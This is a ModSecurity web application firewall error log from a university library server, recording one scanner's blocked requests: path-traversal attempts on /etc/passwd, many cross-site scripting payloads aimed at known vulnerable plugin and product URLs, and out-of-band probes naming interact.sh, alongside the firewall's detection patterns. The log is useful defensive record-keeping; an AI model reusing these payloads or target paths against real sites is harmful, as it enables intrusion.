[Tue Aug 29 11:51:15.727559 2023] [:error] [pid 2497] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15Q8Co-f0AAAnB5UcAAAAJ"]
[Tue Aug 29 11:51:15.752930 2023] [:error] [pid 2508] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:errormessage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x22>< found within ARGS:errormessage: '\\x22><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/plugins/servlet/svnwebclient/error.jsp"] [unique_id "ZO15Q8Co-f0AAAnMeoYAAAAD"]
[Tue Aug 29 11:51:15.875225 2023] [:error] [pid 2347] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15Q8Co-f0AAAkr0EcAAAAC"]
[Tue Aug 29 11:51:15.880545 2023] [:error] [pid 2445] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:graph. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:graph: \\x22zlo onerror=alert(1) \\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/php/device_graph_page.php"] [unique_id "ZO15Q8Co-f0AAAmNp3EAAAAQ"]
[Tue Aug 29 11:51:16.554619 2023] [:error] [pid 2498] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:url: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/plugins/servlet/svnwebclient/statsItem.jsp"] [unique_id "ZO15RMCo-f0AAAnCKywAAAAK"]
[Tue Aug 29 11:51:17.749065 2023] [:error] [pid 2354] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:path: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15RcCo-f0AAAkyyEYAAAAW"]
[Tue Aug 29 11:51:17.876876 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:api_url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:api_url: api_url'><script>alert(document.domain)</script> "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-content/plugins/swipehq-payment-gateway-woocommerce/test-plugin.php"] [unique_id "ZO15RcCo-f0AAAfWOEAAAAAL"]
[Tue Aug 29 11:51:20.539074 2023] [:error] [pid 2493] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )\\x22>< found within ARGS:id: </form><iMg src=x onerror=\\x22prompt(document.domain)\\x22><form>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/Forms/rpAuth_1"] [unique_id "ZO15SMCo-f0AAAm91mwAAAAG"]
[Tue Aug 29 11:51:20.623560 2023] [:error] [pid 2491] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:id: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/phpmyadmin/setup/index.php"] [unique_id "ZO15SMCo-f0AAAm7m9wAAAAE"]
[Tue Aug 29 11:51:21.547813 2023] [:error] [pid 2439] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:RESULT. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );// found within ARGS:RESULT: \\x22,msgArray);alert(document.domain);//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/info.php"] [unique_id "ZO15ScCo-f0AAAmHd@YAAAAz"]
[Tue Aug 29 11:51:21.585227 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:searchOwnerUserName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:searchOwnerUserName: <script>alert(1)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/secure/ConfigurePortalPages!default.jspa"] [unique_id "ZO15ScCo-f0AAAnHQdkAAAAT"]
[Tue Aug 29 11:51:21.588966 2023] [:error] [pid 2343] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:id: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/setup/index.php"] [unique_id "ZO15ScCo-f0AAAknEOcAAAAB"]
[Tue Aug 29 11:51:22.916385 2023] [:error] [pid 2443] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:filtervalue. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:filtervalue: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/Portal/Portal.mwsl"] [unique_id "ZO15SsCo-f0AAAmLPSgAAAAN"]
[Tue Aug 29 11:51:22.919777 2023] [:error] [pid 2491] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://example.com found within TX:1: example.com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfh.unla.ac.id"] [uri "/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword"] [unique_id "ZO15SsCo-f0AAAm7m@EAAAAE"]
[Tue Aug 29 11:51:23.110298 2023] [:error] [pid 2497] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfh.unla.ac.id"] [uri "/api/sso/v2/sso/jwt"] [unique_id "ZO15S8Co-f0AAAnB5VIAAAAJ"]
[Tue Aug 29 11:51:23.564013 2023] [:error] [pid 2502] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:err. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -->< found within ARGS:err: --><script>alert('2Ue0IThdcrNit2de4iq3Tr8D1X0')</script><!--"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/remote/login"] [unique_id "ZO15S8Co-f0AAAnGkIIAAAAR"]
[Tue Aug 29 11:51:23.796962 2023] [:error] [pid 2445] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:viewSurveyError. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within ARGS:viewSurveyError: Unknown survey\\x22><img src=x onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfh.unla.ac.id"] [uri "/Main/Default.aspx"] [unique_id "ZO15S8Co-f0AAAmNp4UAAAAQ"]
[Tue Aug 29 11:51:24.920856 2023] [:error] [pid 2502] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:</script><script>alert(document.domain)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:</script><script>alert(document.domain)</script>: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-content/plugins/amty-thumb-recent-post/amtyThumbPostsAdminPg.php"] [unique_id "ZO15TMCo-f0AAAnGkIUAAAAR"]
[Tue Aug 29 11:51:25.012935 2023] [:error] [pid 2492] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15TcCo-f0AAAm80PAAAAAF"]
[Tue Aug 29 11:51:26.654772 2023] [:error] [pid 2502] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:MESSAGE. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:MESSAGE: MESSAGE</textarea></script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-content/plugins/activehelper-livehelp/server/offline.php"] [unique_id "ZO15TsCo-f0AAAnGkIcAAAAR"]
[Tue Aug 29 11:51:26.788028 2023] [:error] [pid 2445] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:shortcode_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ) found within ARGS:shortcode_id: 1\\x22 onmouseover=alert(document.domain)//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15TsCo-f0AAAmNp4wAAAAQ"]
[Tue Aug 29 11:51:26.887082 2023] [:error] [pid 2354] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:type: \\x22</script><script>alert(document.domain);</script><script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/log"] [unique_id "ZO15TsCo-f0AAAkyyFYAAAAW"]
[Tue Aug 29 11:51:26.892170 2023] [:error] [pid 2443] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:hostname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:hostname: </title><script>alert(document.domain)</script><title>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/php/telnet_form.php"] [unique_id "ZO15TsCo-f0AAAmLPS8AAAAN"]
[Tue Aug 29 11:51:27.628841 2023] [:error] [pid 2443] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:uid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ');\\x22> found within ARGS:uid: \\x22><img src=\\x22x\\x22 onerror=\\x22alert('XSS');\\x22>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/login/"] [unique_id "ZO15T8Co-f0AAAmLPTMAAAAN"]
[Tue Aug 29 11:51:28.871190 2023] [:error] [pid 2492] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:section. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /)</ found within ARGS:section: \\x22><h1>hello</h1><script>alert(/2Ue0IR2M1XBxYBON8r2blbSH9hk/)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/cgi-bin/manlist"] [unique_id "ZO15UMCo-f0AAAm80PsAAAAF"]
[Tue Aug 29 11:51:28.871514 2023] [:error] [pid 2497] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:advSearch. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x22></ found within ARGS:advSearch: 0'\\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15UMCo-f0AAAnB5VwAAAAJ"]
[Tue Aug 29 11:51:28.913684 2023] [:error] [pid 2499] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:galleryId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:galleryId: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-content/plugins/tidio-gallery/popup-insert-help.php"] [unique_id "ZO15UMCo-f0AAAnDFzMAAAAM"]
[Tue Aug 29 11:51:29.547640 2023] [:error] [pid 2445] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x22>< found within ARGS:username: '\\x22><script>javascript:alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/timesheet/login.php"] [unique_id "ZO15UcCo-f0AAAmNp5UAAAAQ"]
[Tue Aug 29 11:51:30.561726 2023] [:error] [pid 2502] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:routineName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:routineName: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/jsps/genrequest.jsp"] [unique_id "ZO15UsCo-f0AAAnGkJMAAAAR"]
[Tue Aug 29 11:51:30.565195 2023] [:error] [pid 2492] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:usr. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '></ found within ARGS:usr: admin'></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/login.php"] [unique_id "ZO15UsCo-f0AAAm80P8AAAAF"]
